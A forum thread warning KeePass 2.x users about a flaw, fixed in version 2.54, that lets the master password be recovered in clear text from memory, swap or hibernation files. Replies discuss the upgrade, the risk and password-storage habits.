KeePass vulnerability: Recover master pwd in clear text from memory dump

[libert19]

If you use KeePass, remember to upgrade it to version 2.54 as soon as it becomes available, this vulnerability affects KeePass 2.x (users of KeePass/Strongbox/KeePass 1.x are unaffected).

In KeePass 2.x before 2.54, it is possible to recover the clear text master password from a memory dump, even when a workspace is locked or no longer running. The memory dump can be a KeePass process dump, swap file (pagefile.sys), hibernation file (hiberfil.sys), or RAM dump of the entire system. The first character cannot be recovered. In 2.54, there is different API usage and/or random string insertion for mitigation.

Source: CVE



Thread where this vulnerability was exposed: Sourceforge


This is PSA thread. I don't understand technical jargon mentioned in above sites  

___

Edit: KeePass 2.54 released: Download

[Lamkuthang]

Yes. That righ OP, There was a vulnerability in KeyPass versions 2.x prior to 2.54, which could compromise the security of the user's master password and it is imperative that KeyPass users upgrade to version 2.54 as soon as it is available to ensure the safety of their sensitive data.

[BitMaxz]

I don't think it's a good idea to use a software or password manager with a vulnerability issue just like before when someone's password was compromised. All of his coins were withdrawn and he also used a password manager. So it's not safe to use any password manager if you want to use a password manager then only use it if there is no money involved on that site. Sample Twitter account and Facebook I use password manager from Chrome only for social media accounts and sites that have no money involved.

So upgrading to the latest version wouldn't help to save your compromised password it would be better to use a piece of paper to write all of your passwords and put it in your wallet(That's the offline way and safer than password manager/PC that still connected to the internet).

[348Judah]

If you use Keypass, remember to upgrade it to version 2.54 as soon as it becomes available, this vulnerability affects keepass 2.x (users of keepassXC/Strongbox/KeePass 1.x are unaffected).

This is not the best option to take as a means of storing your keys since it a software development by some set of people you can't talk much about, i believe there are many orher means one can use to secure his seeds or keys using examples like washers, plated metalic sheet, laminated paper or any other offline means that can handles our wallet keys safe, not only this, we can alwa avoid a third party to have access to them, and always ensure that the computer system you're using is not always connected to the internet, which means your wallet has to be on an airgapped device.

[Zaguru12]

This is not the best option to take as a means of storing your keys since it a software development by some set of people you can't talk much about, i believe there are many orher means one can use to secure his seeds or keys using examples like washers, plated metalic sheet, laminated paper or any other offline means that can handles our wallet keys safe, not only this, we can alwa avoid a third party to have access to them, and always ensure that the computer system you're using is not always connected to the internet, which means your wallet has to be on an airgapped device.

Although I don’t recommend saving passwords online not just because of the vulnerability to attacks but also this makes one to rely on them total and can cause one to forget the password total. But when it comes to password managers I think KeePassXC is one of the highly recommended ones by the forum community. It is open source and the seeds or passwords generated can be stored on encrypted form where only you can access it.

[TryNinja]

Important thing to mention, from the SourceForge discussion:

An attacker needs read access to your filesystem or your RAM. Realistically, if your computer is infected by malware that's running in the background, this doesn't make it much worse - for that you could already be attacked by e.g. KeeFarce etc. (and there's no protection against that without specialized HW).

Unless you expect to be specifically targeted by someone sophisticated, I would keep calm. The issue here could be, say, someone stealing your computer and taking the HDD out. It's not eniterely unrealistic, after all that's what the police will try to do in a raid. You can find several companies developing special forensic software for these kinds of scenarios. But it's really not what most people should panic about. If you use full disk encryption with a strong password, it gets even more unlikely.

This finding alone doesn't allow anyone to steal your passwords remotely over the internet.

So not as troublesome as it sounds (still a big problem, of course).

[Husires]

It is a kind of physical attack or RAM access, but it is unfortunate to see what happened with an open source program. It is better to keep the passwords encrypted in a password manager, so even if the hackers gain access to the hemorrhoid management program, they still need to access the private key from For decryption, which you can keep in an offline environment.

Thanks for the warning and it is better not to trust the default in open source software.

[TryNinja]

2.54 is not out yet.

To clarify, "within the next two months" was meant as an upper bound. The other features that I'm currently working on (which are also related to security and which I don't want to postpone) are almost finished; a realistic estimate for the KeePass 2.54 release probably is "in the beginning of June" (i.e. 2-3 weeks), but I cannot guarantee that.

Best regards,
Dominik

But if anyone is worried, there is a development snapshot with corrections: https://keepass.info/filepool/KeePass_230507.zip

Of course, you should verify the link through the developer's own comment on SourceForge: https://sourceforge.net/p/keepass/discussion/329220/thread/f3438e6283/?limit=25#0829

FYI: It's KeePass, not KeyPass.

[libert19]

Bump! KeePass 2.54 released.